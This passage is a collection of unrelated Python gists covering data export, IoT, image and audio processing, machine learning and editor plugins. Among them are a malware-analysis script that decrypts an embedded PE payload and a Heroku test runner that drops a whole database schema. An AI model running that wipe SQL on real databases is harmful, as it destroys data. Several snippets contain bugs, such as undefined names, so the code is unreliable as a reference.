# Is student enrolled or pre-enrolled and with a start date in the next 5 days?
# "0" is active (False boolean value), anything else is inactive.
# "-1"
if row.enroll_status == 0:
enrolled = True
if row.enroll_status == -1 and row.entrydate:
# Parse entrydate, and make it three days earlier
#entry_date = datetime.strptime(row.entrydate[0:10],"%Y-%m-%d") + timedelta(days=-3)
entry_date = row.entrydate + timedelta(days=-14)
print "Found pre-registered! dcid %s, entry_date %s" % (row.dcid, entry_date, )
if entry_date < datetime.now():
enrolled = True
# Check grade level, if enroll_status is ok!
if row.grade_level >= student_data.minimum_grade_level and row.grade_level <= student_data.maximum_grade_level:
valid_grade = True
else:
valid_grade = False
return enrolled and valid_grade
def ps_fullexport_students():
print "PowerSchool Export of Students data started."
db = PsDB()
student_data = StudentData()
header = []
for field in student_data.fields_for_moodle:
header.append(field)
correct_students_file_name = "ps_students.csv"
print "Writing data to files %s" % correct_students_file_name
correct_students_file = open(correct_students_file_name, 'wb')
correct_students_writer = csv.writer(correct_students_file,dialect='excel')
correct_students_writer.writerow(header)
print "Header written to files."
count = 0
main_student_data = db.get_session().query(student_data.table).all()
custom_student_data = db.get_session().query(student_data.custom_fields_table).all()
for row in main_student_data:
# Full Dump Line
line = []
# Student specific restriction!!! "0" is active (False boolean value), anything else is inactive.
if valid_student(row, student_data):
for cf in custom_student_data:
if row.dcid == cf.studentsdcid:
for field in student_data.fields_for_moodle:
line.append( get_field(row, cf, student_data, field) )
if line:
writer = correct_students_writer
count = count + 1
writer.writerow(line)
if count % 50 == 0:
print "Exported %s records." % count
correct_students_file.close()
print "Finished. Exported %s records in total." % count
if __name__ == "__main__":
ps_fullexport_students()
```
#### File: hard-gists/ce648166902041fbc613/snippet.py
```python
import time
# external
import flask
from twython import Twython
# local
from env import ENV
#INITS
# flask application
app = flask.Flask(__name__)
app.config['URL'] = ENV['URL']
app.config['SECRET_KEY'] = ENV['SECRET_KEY']
# twython object
twitter = Twython(
ENV['API_KEY'],
ENV['API_SECRET'],
)
# FUNCTIONS
def force_unfollow_fans(twitter):
'''
fans == people that follow you that you dont follow back
we block and them unblock them to force an unfollow
'''
user_name = twitter.verify_credentials()['screen_name']
followers = twitter.get_followers_ids()['ids']
following = twitter.get_friends_ids()['ids']
fans = set(followers) - set(following)
for fan in fans:
fan_name = twitter.lookup_user(user_id=fan)[0]['screen_name']
twitter.create_block(user_id=fan)
twitter.destroy_block(user_id=fan)
print('@{} force unfollowed @{}'.format(user_name, fan_name))
time.sleep(10) # to avoid going too far past the rate limit
# ROUTES
@app.route('/')
def index():
return 'go to /login'
@app.route('/login')
def login():
auth = twitter.get_authentication_tokens(callback_url=ENV['URL']+'/callback')
flask.session['oauth_token'] = auth['oauth_token']
flask.session['oauth_token_secret'] = auth['oauth_token_secret']
return flask.redirect(auth['auth_url'])
@app.route('/callback')
def callback():
twitter = Twython(
ENV['API_KEY'],
ENV['API_SECRET'],
flask.session['oauth_token'],
flask.session['oauth_token_secret'],
)
auth_creds = twitter.get_authorized_tokens(flask.request.args['oauth_verifier'])
twitter = Twython(
ENV['API_KEY'],
ENV['API_SECRET'],
auth_creds['oauth_token'],
auth_creds['oauth_token_secret'],
)
force_unfollow_fans(twitter)
return 'done!'
if __name__ == '__main__':
app.run(debug=True, port=int(ENV['PORT']))
```
#### File: hard-gists/cf4b324f8955bc56ce0ff9399d9fdea6/snippet.py
```python
import ds18x20
import gc
from machine import Timer, Pin
import network
import onewire
from time import sleep_ms
from umqtt.simple import MQTTClient
import urandom
PIN_TEMP = 5
def send_temp(t):
c = MQTTClient('clientname', '<mqtt_server_ip>')
c.connect()
c.publish('/topic/temp1', str(t))
sleep_ms(500)
print('Sent!')
c.disconnect()
def read_temp():
ds = ds18x20.DS18X20(onewire.OneWire(Pin(5)))
roms = ds.scan()
ds.convert_temp()
sleep_ms(100)
# assume there is only 1 probe
return ds.read_temp(roms[0])
def run():
# tim = Timer(-1)
# tim.init(period=2000, mode=Timer.PERIODIC, callback=send_temp)
wlan = network.WLAN(network.STA_IF)
while True:
try:
if wlan.isconnected():
t = read_temp()
send_temp(t)
sleep_ms(10000)
else:
sleep_ms(1000)
except:
pass
run()
```
#### File: hard-gists/cfc9f059459cfefd1f61134b48291436/snippet.py
```python
import cStringIO
import PIL.Image
from ssim import compute_ssim
def get_ssim_at_quality(photo, quality):
"""Return the ssim for this JPEG image saved at the specified quality"""
ssim_photo = cStringIO.StringIO()
# optimize is omitted here as it doesn't affect
# quality but requires additional memory and cpu
photo.save(ssim_photo, format="JPEG", quality=quality, progressive=True)
ssim_photo.seek(0)
ssim_score = compute_ssim(photo, PIL.Image.open(ssim_photo))
return ssim_score
def _ssim_iteration_count(lo, hi):
"""Return the depth of the binary search tree for this range"""
if lo >= hi:
return 0
else:
return int(log(hi - lo, 2)) + 1
def jpeg_dynamic_quality(original_photo):
"""Return an integer representing the quality that this JPEG image should be
saved at to attain the quality threshold specified for this photo class.
Args:
original_photo - a prepared PIL JPEG image (only JPEG is supported)
"""
ssim_goal = 0.95
hi = 85
lo = 80
# working on a smaller size image doesn't give worse results but is faster
# changing this value requires updating the calculated thresholds
photo = original_photo.resize((400, 400))
if not _should_use_dynamic_quality():
default_ssim = get_ssim_at_quality(photo, hi)
return hi, default_ssim
# 95 is the highest useful value for JPEG. Higher values cause different behavior
# Used to establish the image's intrinsic ssim without encoder artifacts
normalized_ssim = get_ssim_at_quality(photo, 95)
selected_quality = selected_ssim = None
# loop bisection. ssim function increases monotonically so this will converge
for i in xrange(_ssim_iteration_count(lo, hi)):
curr_quality = (lo + hi) // 2
curr_ssim = get_ssim_at_quality(photo, curr_quality)
ssim_ratio = curr_ssim / normalized_ssim
if ssim_ratio >= ssim_goal:
# continue to check whether a lower quality level also exceeds the goal
selected_quality = curr_quality
selected_ssim = curr_ssim
hi = curr_quality
else:
lo = curr_quality
if selected_quality:
return selected_quality, selected_ssim
else:
default_ssim = get_ssim_at_quality(photo, hi)
return hi, default_ssim
```
#### File: hard-gists/d049a307a271052dc740/snippet.py
```python
import sys
import pefile
from StringIO import StringIO
from Crypto.Cipher import AES
K =''.join((chr(x) for x in range(15,0x4f,2)))
ENC_HEADER="\x23\x59\x90\x70\xe9\xc1\xec\x82\xb4\x87\xb3\x4e\x03\x10\x6c\x2e"
decrypt = lambda d: AES.new(K,AES.MODE_ECB).decrypt(d)
chunks = lambda l, n: [l[x: x+n] for x in xrange(0, len(l), n)]
IDX = 0
def decrypt_payload(d,off):
global IDX
out = StringIO()
if decrypt(d[off:off+16]).startswith('MZ'):
print '[%d][+] found encrypted MZ @ %X'% (IDX,off)
try:
pe_hdr = decrypt(d[off:off+0x400])
pe = pefile.PE(data=pe_hdr)
except:
return None
print '[%d][+] OK its parsable, lets proceed' % IDX
for c in chunks(d[off:],16):
out.write(decrypt(c))
IDX +=1
return out
path = sys.argv[1]
#off = int(sys.argv[2],16)
#size = int(sys.argv[3],16)
#cnt = 0
with open(path) as f:
d=f.read()
off =d.find(ENC_HEADER)
while off != -1:
r= decrypt_payload(d,off)
if not r:
print '[-] this is not a PE i was looking for...'
sys.exit(1)
d = r.getvalue()
off =d.find(ENC_HEADER)
with open(path+'.dec','wb') as f:
f.write(d)
print '[*] decrypted payload saved as',path+'.dec'
```
#### File: hard-gists/d100a028027c5a6b8340/snippet.py
```python
from dateutil import rrule
import datetime
# Generate ruleset for holiday observances on the NYSE
def NYSE_holidays(a=datetime.date.today(), b=datetime.date.today()+datetime.timedelta(days=365)):
rs = rrule.rruleset()
# Include all potential holiday observances
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=31, byweekday=rrule.FR)) # New Years Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 1, bymonthday= 1)) # New Years Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 1, bymonthday= 2, byweekday=rrule.MO)) # New Years Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 1, byweekday= rrule.MO(3))) # Martin Luther King Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 2, byweekday= rrule.MO(3))) # Washington's Birthday
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, byeaster= -2)) # Good Friday
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 5, byweekday= rrule.MO(-1))) # Memorial Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 7, bymonthday= 3, byweekday=rrule.FR)) # Independence Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 7, bymonthday= 4)) # Independence Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 7, bymonthday= 5, byweekday=rrule.MO)) # Independence Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth= 9, byweekday= rrule.MO(1))) # Labor Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=11, byweekday= rrule.TH(4))) # Thanksgiving Day
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=24, byweekday=rrule.FR)) # Christmas
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=25)) # Christmas
rs.rrule(rrule.rrule(rrule.YEARLY, dtstart=a, until=b, bymonth=12, bymonthday=26, byweekday=rrule.MO)) # Christmas
# Exclude potential holidays that fall on weekends
rs.exrule(rrule.rrule(rrule.WEEKLY, dtstart=a, until=b, byweekday=(rrule.SA,rrule.SU)))
return rs
# Generate ruleset for NYSE trading days
def NYSE_tradingdays(a=datetime.date.today(), b=datetime.date.today()+datetime.timedelta(days=365)):
rs = rrule.rruleset()
rs.rrule(rrule.rrule(rrule.DAILY, dtstart=a, until=b))
# Exclude weekends and holidays
rs.exrule(rrule.rrule(rrule.WEEKLY, dtstart=a, byweekday=(rrule.SA,rrule.SU)))
rs.exrule(NYSE_holidays(a,b))
return rs
# Examples
# List all NYSE holiday observances for the coming year
print "NYSE Holidays\n"
for dy in NYSE_holidays():
print dy.strftime('%b %d %Y')
# Count NYSE trading days in next 5 years
print "\n\nTrading Days\n"
for yr in range(2015,2020):
tdays = len(list(NYSE_tradingdays(datetime.datetime(yr,1,1),datetime.datetime(yr,12,31))))
print "{0} {1}".format(yr,tdays)
```
#### File: hard-gists/d29d079100f8d81b905e/snippet.py
```python
import logging
from sklearn.metrics import roc_auc_score
from keras.callbacks import Callback
class IntervalEvaluation(Callback):
def __init__(self, validation_data=(), interval=10):
super(Callback, self).__init__()
self.interval = interval
self.X_val, self.y_val = validation_data
def on_epoch_end(self, epoch, logs={}):
if epoch % self.interval == 0:
y_pred = self.model.predict_proba(self.X_val, verbose=0)
score = roc_auc_score(self.y_val, y_pred)
logging.info("interval evaluation - epoch: {:d} - score: {:.6f}".format(epoch, score))
# (snip)
if __name__ == '__main__':
l.basicConfig(format='%(asctime)s %(message)s', level=l.INFO)
X_train, y_train, X_test, y_test = load_data()
ival = IntervalEvaluation(validation_data=(X_test, y_test), interval=10)
clf = keras_model(input_size=X_train.shape[1])
clf.fit(X_train, y_train, nb_epoch=100, batch_size=128, verbose=0, callbacks=[ival])
```
#### File: hard-gists/d37ab1524a7d5e373ee5a2a0176ebd22/snippet.py
```python
import glob
import h5py
import matplotlib.animation as animation
import matplotlib.pyplot as plot
import numpy as np
import tensorflow as tf
def main():
datafiles = glob.glob('data/*.h5')
for datafile in datafiles:
with h5py.File(datafile) as data:
figure = plot.figure()
imageplot = plot.imshow(np.zeros((227, 227, 3), dtype=np.uint8))
def next_frame(i):
image = 255 - data['images'][i].transpose(1, 2, 0)[:, :, ::-1]
imageplot.set_array(image)
return imageplot,
animate = animation.FuncAnimation(figure, next_frame, frames=range(len(data['images'])), interval=252, blit=False)
plot.show()
if __name__ == '__main__':
main()
```
#### File: hard-gists/d52d9ba44541fabaf4b012f4e62d675b/snippet.py
```python
import os
from django.test.runner import DiscoverRunner
"""
WARNING: WHEN USED INCORRECTLY THIS TEST RUNNER WILL DROP ALL TABLES IN YOUR PRODUCTION
DATABASE!!!
Heroku does not give users createdb/dropdb permissions, therefore Heroku CI cannot run tests for django.
In order to fix this, use this test runner instead which attempts to minimally override the
default test runner by a) forcing keepdb=True to stop database create/drop, and b) by dropping all
tables after a test run and resetting the database to its initial blank state.
Usage:
1. In your django test settings file add the following two lines to ensure that the test
database name is the same as the Heroku provided database name.
DATABASES['default'] = env.db('DATABASE_URL') # or whatever you use to load the Heroku database settings
DATABASES['default']['TEST'] = {'NAME': DATABASES['default']['NAME']}
2. Set the testrunner to this file
TEST_RUNNER = 'your_modules.HerokuDiscoverRunner'
3. Set an environment variable on heroku CI of IS_HEROKU_TEST=1 to enable this runner, otherwise
the runner will exit as a safety measure.
"""
class HerokuDiscoverRunner(DiscoverRunner):
def setup_databases(self, **kwargs):
if not os.environ.get('IS_HEROKU_TEST'):
raise ValueError(
"The IS_HEROKU_TEST env variable must be set to enable this. WARNING: "
"This test runner will wipe all tables in the database it targets!")
self.keepdb = True
return super(HerokuDiscoverRunner, self).setup_databases(**kwargs)
def _wipe_tables(self, connection):
with connection.cursor() as cursor:
cursor.execute(
"""
DROP SCHEMA public CASCADE;
CREATE SCHEMA public;
GRANT ALL ON SCHEMA public TO postgres;
GRANT ALL ON SCHEMA public TO public;
COMMENT ON SCHEMA public IS 'standard public schema';
"""
)
def teardown_databases(self, old_config, **kwargs):
self.keepdb = True
for connection, old_name, destroy in old_config:
if destroy:
self._wipe_tables(connection)
super(HerokuDiscoverRunner, self).teardown_databases(old_config, **kwargs)
```
#### File: hard-gists/d6eb474543c32eb33504/snippet.py
```python
import io
import urllib
import threading
from kivy.uix.image import Image
from kivy.app import App
from kivy.properties import StringProperty
from kivy.core.image import Image as CoreImage
from kivy.clock import Clock
from collections import deque
class MjpegViewer(Image):
url = StringProperty()
def start(self):
self.quit = False
self._queue = deque()
self._thread = threading.Thread(target=self.read_stream)
self._thread.daemon = True
self._thread.start()
self._image_lock = threading.Lock()
self._image_buffer = None
Clock.schedule_interval(self.update_image, 1 / 30.)
def stop(self):
self.quit = True
self._thread.join()
Clock.unschedule(self.read_queue)
def read_stream(self):
stream = urllib.urlopen(self.url)
bytes = ''
while not self.quit:
bytes += stream.read(1024)
a = bytes.find('\xff\xd8')
b = bytes.find('\xff\xd9')
if a != -1 and b != -1:
jpg = bytes[a:b + 2]
bytes = bytes[b + 2:]
data = io.BytesIO(jpg)
im = CoreImage(data,
ext="jpeg",
nocache=True)
with self._image_lock:
self._image_buffer = im
def update_image(self, *args):
im = None
with self._image_lock:
im = self._image_buffer
self._image_buffer = None
if im is not None:
self.texture = im.texture
self.texture_size = im.texture.size
if __name__ == "__main__":
class MjpegViewerApp(App):
def build(self):
viewer = MjpegViewer(
url=
"http://192.168.3.11:3344/axis-cgi/mjpg/video.cgi?resolution=320x240")
viewer.start()
return viewer
MjpegViewerApp().run()
```
#### File: hard-gists/dc673da0c531c7a6059b/snippet.py
```python
import sublime
import sublime_plugin
# { "keys": ["alt+shift+p"], "command": "fuzzy_pretty" },
BRACKETS = {
'{': '}',
'(': ')',
'[': ']',
}
SEPS = [
';', ',', '\n',
]
OPERATERS = [
':', '=',
]
def build(tree, indent=''):
if indent is False:
out = ''
for node in tree:
if isinstance(node, str):
out += node
elif isinstance(node, list):
out += build(node, indent=False)
return out
out = ''
test = None
line = ''
for i, node in enumerate(tree):
if isinstance(node, str):
if node in BRACKETS.values():
out = out[:-len(line)]
line = line[:-1] + node + '\n'
elif node in SEPS:
out = out[:-len(line)]
line = line[:-1] + node + '\n'
else:
line = indent + node + '\n'
elif isinstance(node, list):
test = build(node, indent=False)
if len(line+test) < 80:
out = out[:-len(line)]
line = line[:-1] + test + '\n'
else:
line = build(node, indent=indent+' ')
out += line
return out
def proc(text):
buf = ''
root = []
context = root
stacks = []
brackets = []
for c in text:
if len(brackets) > 0 and c == brackets[-1]:
brackets.pop()
context.append(buf + c)
buf = ''
context = stacks.pop()
elif c in BRACKETS:
brackets.append(BRACKETS[c])
context.append(buf + c)
buf = ''
new_context = []
context.append(new_context)
stacks.append(context)
context = new_context
elif c in SEPS:
if c == '\n':
c = ''
if buf == '' and len(context) > 0:
context[-1] += c
elif buf == '' and c == '':
pass
else:
context.append(buf + c)
buf = ''
elif buf == '' and c in ' \t':
pass
else:
buf += c
context.append(buf)
return build(root)
class FuzzyPrettyCommand(sublime_plugin.TextCommand):
def run(self, edit, **kwargs):
view = self.view
sel = view.sel()[0]
region = sel
if sel.empty():
region = sublime.Region(0, view.size())
text = view.substr(region)
text = proc(text)
view.replace(edit, region, text)
```
#### File: hard-gists/dd1538665994b48972a62966b4369354/snippet.py
```python
import photos
import console
from objc_util import *
CIFilter, CIImage, CIContext, CIDetector, CIVector = map(ObjCClass, ['CIFilter', 'CIImage', 'CIContext', 'CIDetector', 'CIVector'])
def take_photo(filename='.temp.jpg'):
img = photos.capture_image()
if img:
img.save(filename)
return filename
def pick_photo(filename='.temp.jpg'):
img = photos.pick_image()
if img:
img.save(filename)
return filename
def load_ci_image(img_filename):
data = NSData.dataWithContentsOfFile_(img_filename)
if not data:
raise IOError('Could not read file')
ci_img = CIImage.imageWithData_(data)
return ci_img
def find_faces(ci_img):
opt = {'CIDetectorAccuracy': 'CIDetectorAccuracyHigh'}
d = CIDetector.detectorOfType_context_options_('CIDetectorTypeFace', None, opt)
faces = d.featuresInImage_(ci_img)
return faces
def apply_perspective(corners, ci_img):
tr, br, tl, bl = [CIVector.vectorWithX_Y_(c.x, c.y) for c in corners]
filter = CIFilter.filterWithName_('CIPerspectiveCorrection')
filter.setDefaults()
filter.setValue_forKey_(ci_img, 'inputImage')
filter.setValue_forKey_(tr, 'inputTopRight')
filter.setValue_forKey_(tl, 'inputTopLeft')
filter.setValue_forKey_(br, 'inputBottomRight')
filter.setValue_forKey_(bl, 'inputBottomLeft')
out_img = filter.valueForKey_('outputImage')
return out_img
def write_output(out_ci_img, filename='.output.jpg'):
ctx = CIContext.contextWithOptions_(None)
cg_img = ctx.createCGImage_fromRect_(out_ci_img, out_ci_img.extent())
ui_img = UIImage.imageWithCGImage_(cg_img)
c.CGImageRelease.argtypes = [c_void_p]
c.CGImageRelease.restype = None
c.CGImageRelease(cg_img)
c.UIImageJPEGRepresentation.argtypes = [c_void_p, CGFloat]
c.UIImageJPEGRepresentation.restype = c_void_p
data = ObjCInstance(c.UIImageJPEGRepresentation(ui_img.ptr, 0.75))
data.writeToFile_atomically_(filename, True)
return filename
def main():
console.clear()
i = console.alert('Info', 'This script detects faces in a photo.', 'Take Photo', 'Pick from Library')
if i == 1:
filename = take_photo()
else:
filename = pick_photo()
if not filename:
return
ci_img = load_ci_image(filename)
out_file = write_output(ci_img)
console.show_image(out_file)
faces = find_faces(ci_img)
if faces.count() == 0:
print('Error: Could not find a face in the photo. Please try again with a different image.')
return
j=0
for face in faces:
b = face.bounds()
w=b.size.width
h=b.size.height
rt=CGPoint(b.origin.x+w,b.origin.y+h)
rb=CGPoint(b.origin.x+w,b.origin.y)
lt=CGPoint(b.origin.x,b.origin.y+h)
lb=CGPoint(b.origin.x,b.origin.y)
corners = (rt,rb,lt,lb)
out_img = apply_perspective(corners, ci_img)
j=j+1
out_file = write_output(out_img,filename='.output'+str(j)+'.jpg')
console.show_image(out_file)
print('Tap and hold the image to save it to your camera roll.')
if __name__ == '__main__':
main()
```
#### File: hard-gists/df919538bcef391bc89f/snippet.py
```python
import numpy
import pyaudio
import re
import sys
WIDTH = 79
BOOST = 1.0
# Create a nice output gradient using ANSI escape sequences.
cols = [30, 34, 35, 91, 93, 97]
chars = [(' ', False), (':', False), ('%', False), ('#', False),
('#', True), ('%', True), (':', True)]
gradient = []
for bg, fg in zip(cols, cols[1:]):
for char, invert in chars:
if invert:
bg, fg = fg, bg
gradient.append('\x1b[{};{}m{}'.format(fg, bg + 10, char))
class Spectrogram(object):
def __init__(self):
self.audio = pyaudio.PyAudio()
def __enter__(self):
"""Open the microphone stream."""
device_index = self.find_input_device()
device_info = self.audio.get_device_info_by_index(device_index)
rate = int(device_info['defaultSampleRate'])
self.buffer_size = int(rate * 0.02)
self.stream = self.audio.open(format=pyaudio.paInt16,
channels=1, rate=rate, input=True,
input_device_index=device_index,
frames_per_buffer=self.buffer_size)
return self
def __exit__(self, *ignored):
"""Close the microphone stream."""
self.stream.close()
def find_input_device(self):
"""
Find a microphone input device. Return None if no preferred
deveice was found, and the default should be used.
"""
for i in range(self.audio.get_device_count()):
name = self.audio.get_device_info_by_index(i)['name']
if re.match('mic|input', name, re.I):
return i
return None
def color(self, x):
"""
Given 0 <= x <= 1 (input is clamped), return a string of ANSI
escape sequences representing a gradient color.
"""
x = max(0.0, min(1.0, x))
return gradient[int(x * (len(gradient) - 1))]
def listen(self):
"""Listen for one buffer of audio and print a gradient."""
block_string = self.stream.read(self.buffer_size)
block = numpy.fromstring(block_string, dtype='h') / 32768.0
nbands = 30 * WIDTH
fft = abs(numpy.fft.fft(block, n=nbands))
pos, neg = numpy.split(fft, 2)
bands = (pos + neg[::-1]) / float(nbands) * BOOST
line = (self.color(x) for x in bands[:WIDTH])
print ''.join(line) + '\x1b[0m'
sys.stdout.flush()
if __name__ == '__main__':
with Spectrogram() as s:
while True:
s.listen()
```
#### File: hard-gists/e196107b5e0afc834652bd3153030c42/snippet.py
```python
import os
import portpicker
import subprocess
import sys
import tensorflow as tf
import threading
import time
flags = tf.flags
flags.DEFINE_integer("iters", 10, "Maximum number of additions")
flags.DEFINE_integer("data_mb", 128, "size of vector in MBs")
flags.DEFINE_boolean("verbose", False, "whether to have verbose logging")
flags.DEFINE_boolean("profile", False, "whether to collect CPU profile")
# internal flags, set by client
flags.DEFINE_string("task_index", "", "# of current task")
flags.DEFINE_string("port0", "12222", "port of worker1, used as master")
flags.DEFINE_string("port1", "12223", "port of worker2")
FLAGS = flags.FLAGS
# setup local cluster from flags
def session_config():
optimizer_options = tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)
graph_options = tf.GraphOptions(optimizer_options=optimizer_options)
config = tf.ConfigProto(graph_options=graph_options,
intra_op_parallelism_threads=10,
inter_op_parallelism_threads=10)
host = "127.0.0.1"
def clusterspec():
cluster = {"worker": [host+":"+FLAGS.port0, host+":"+FLAGS.port1]}
return tf.train.ClusterSpec(cluster).as_cluster_def()
def create_graph(device0, device1):
"""Create graph that keeps var1 on device0, var2 on device1 and adds them"""
tf.reset_default_graph()
dtype=tf.int32
params_size = 250*1000*FLAGS.data_mb # 1MB is 250k integers
with tf.device(device0):
var1 = tf.get_variable("var1", [params_size], dtype,
initializer=tf.ones_initializer())
with tf.device(device1):
var2 = tf.get_variable("var2", [params_size], dtype,
initializer=tf.ones_initializer())
add_op = var1.assign_add(var2)
init_op = tf.global_variables_initializer()
return init_op, add_op
def create_done_queue(i):
"""Queue used to signal death for i'th worker."""
with tf.device("/job:worker/task:%s" % (i)):
return tf.FIFOQueue(1, tf.int32, shared_name="done_queue"+
str(i))
def run_benchmark(sess, init_op, add_op):
"""Returns MB/s rate of addition."""
sess.run(init_op)
sess.run(add_op.op) # warm-up
start_time = time.time()
for i in range(FLAGS.iters):
sess.run(add_op.op)
elapsed_time = time.time() - start_time
return float(FLAGS.iters)*FLAGS.data_mb/elapsed_time
def run_benchmark_local():
ops = create_graph(None, None)
sess = tf.Session(config=session_config())
return run_benchmark(sess, *ops)
def run_benchmark_distributed():
ops = create_graph("/job:worker/task:0", "/job:worker/task:1")
queues = [create_done_queue(0), create_done_queue(1)]
# launch distributed service
port0, port1 = [portpicker.pick_unused_port() for _ in range(2)]
flags = " ".join(sys.argv) # pass parent flags to children
def run_worker(w):
my_env = os.environ.copy()
if not FLAGS.verbose:
my_env["CUDA_VISIBLE_DEVICES"] = ""
my_env["TF_CPP_MIN_LOG_LEVEL"] = "2"
if FLAGS.profile:
my_env["LD_PRELOAD"]="/usr/lib/libtcmalloc_and_profiler.so.4"
my_env["CPUPROFILE"]="/tmp/profile.out.%s"%(w)
cmd = "python %s --task=%d --port0=%s --port1=%s"%(flags, w, port0, port1)
subprocess.Popen(cmd, shell=True, stderr=subprocess.STDOUT,
env=my_env)
run_worker(0)
run_worker(1)
sess = tf.Session("grpc://%s:%s"%(host, port0), config=session_config())
rate = run_benchmark(sess, *ops)
# bring down workers
if FLAGS.verbose:
print("Killing workers.")
sess.run(queues[1].enqueue(1))
sess.run(queues[0].enqueue(1)) # bring down master last
return rate
if __name__=='__main__':
if not FLAGS.task_index:
rate1 = run_benchmark_local()
rate2 = run_benchmark_distributed()
if FLAGS.verbose:
print("Adding data in %d MB chunks" %(FLAGS.data_mb))
print("Local rate: %.2f MB/s" %(rate1,))
print("Distributed rate: %.2f MB/s" %(rate2,))
else: # Launch TensorFlow server
server = tf.train.Server(clusterspec(), config=session_config(),
job_name="worker",
task_index=int(FLAGS.task_index))
queue = create_done_queue(FLAGS.task_index)
sess = tf.Session(server.target, config=session_config())
sess.run(queue.dequeue())
time.sleep(1) # give chance for master session.run call to return
if FLAGS.verbose:
print("Worker %s quitting." %(FLAGS.task_index))
```
#### File: hard-gists/e223622e255bd5b8c9130407397a0494/snippet.py
```python
import os
import librosa
import matplotlib
import matplotlib.pyplot as plt
matplotlib.rcParams['svg.fonttype'] = 'none'
import numpy as np
from scipy.io.wavfile import read as readwav
# Constants
n_fft = 512
hop_length = 256
SR = 16000
over_sample = 4
res_factor = 0.8
octaves = 6
notes_per_octave=10
# Plotting functions
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'alpha': ((0.0, 1.0, 1.0),
(1.0, 0.0, 0.0))
}
my_mask = matplotlib.colors.LinearSegmentedColormap('MyMask', cdict)
plt.register_cmap(cmap=my_mask)
def note_specgram(path, ax, peak=70.0, use_cqt=True):
# Add several samples together
if isinstance(path, list):
for i, p in enumerate(path):
sr, a = readwav(f)
audio = a if i == 0 else a + audio
# Load one sample
else:
sr, audio = readwav(f)
audio = audio.astype(np.float32)
if use_cqt:
C = librosa.cqt(audio, sr=sr, hop_length=hop_length,
bins_per_octave=int(notes_per_octave*over_sample),
n_bins=int(octaves * notes_per_octave * over_sample),
real=False,
filter_scale=res_factor,
fmin=librosa.note_to_hz('C2'))
else:
C = librosa.stft(audio, n_fft=n_fft, win_length=n_fft, hop_length=hop_length, center=True)
mag, phase = librosa.core.magphase(C)
phase_angle = np.angle(phase)
phase_unwrapped = np.unwrap(phase_angle)
dphase = phase_unwrapped[:, 1:] - phase_unwrapped[:, :-1]
dphase = np.concatenate([phase_unwrapped[:, 0:1], dphase], axis=1) / np.pi
mag = (librosa.logamplitude(mag**2, amin=1e-13, top_db=peak, ref_power=np.max) / peak) + 1
ax.matshow(dphase[::-1, :], cmap=plt.cm.rainbow)
ax.matshow(mag[::-1, :], cmap=my_mask)
def plot_notes(list_of_paths, rows=2, cols=4, col_labels=[], row_labels=[],
use_cqt=True, peak=70.0):
"""Build a CQT rowsXcols.
"""
column = 0
N = len(list_of_paths)
assert N == rows*cols
fig, axes = plt.subplots(rows, cols, sharex=True, sharey=True)
fig.subplots_adjust(left=0.1, right=0.9, wspace=0.05, hspace=0.1)
# fig = plt.figure(figsize=(18, N * 1.25))
for i, path in enumerate(list_of_paths):
row = i / cols
col = i % cols
if rows == 1:
ax = axes[col]
elif cols == 1:
ax = axes[row]
else:
ax = axes[row, col]
print row, col, path, ax, peak, use_cqt
note_specgram(path, ax, peak, use_cqt)
ax.set_axis_bgcolor('white')
ax.set_xticks([]); ax.set_yticks([])
if col == 0 and row_labels:
ax.set_ylabel(row_labels[row])
if row == rows-1 and col_labels:
ax.set_xlabel(col_labels[col])
```
#### File: hard-gists/e2ef822c744357a4ed16ec0c885100a3/snippet.py
```python
from keras.models import Sequential
from keras.layers import Dense
from keras.utils.io_utils import HDF5Matrix
import numpy as np
def create_dataset():
import h5py
X = np.random.randn(200,10).astype('float32')
y = np.random.randint(0, 2, size=(200,1))
f = h5py.File('test.h5', 'w')
# Creating dataset to store features
X_dset = f.create_dataset('my_data', (200,10), dtype='f')
X_dset[:] = X
# Creating dataset to store labels
y_dset = f.create_dataset('my_labels', (200,1), dtype='i')
y_dset[:] = y
f.close()
create_dataset()
# Instantiating HDF5Matrix for the training set, which is a slice of the first 150 elements
X_train = HDF5Matrix('test.h5', 'my_data', start=0, end=150)
y_train = HDF5Matrix('test.h5', 'my_labels', start=0, end=150)
# Likewise for the test set
X_test = HDF5Matrix('test.h5', 'my_data', start=150, end=200)
y_test = HDF5Matrix('test.h5', 'my_labels', start=150, end=200)
# HDF5Matrix behave more or less like Numpy matrices with regards to indexing
print(y_train[10])
# But they do not support negative indices, so don't try print(X_train[-1])
model = Sequential()
model.add(Dense(64, input_shape=(10,), activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='sgd')
# Note: you have to use shuffle='batch' or False with HDF5Matrix
model.fit(X_train, y_train, batch_size=32, shuffle='batch')
model.evaluate(X_test, y_test, batch_size=32)
```
#### File: hard-gists/e3433ebba20c92b63111/snippet.py
```python
import ui
import os
from objc_util import ObjCInstance, ObjCClass
from operator import attrgetter
import time
import threading
import functools
import ftplib
import re
# http://stackoverflow.com/a/6547474
def human_size(size_bytes):
'''Helper function for formatting human-readable file sizes'''
if size_bytes == 1:
return "1 byte"
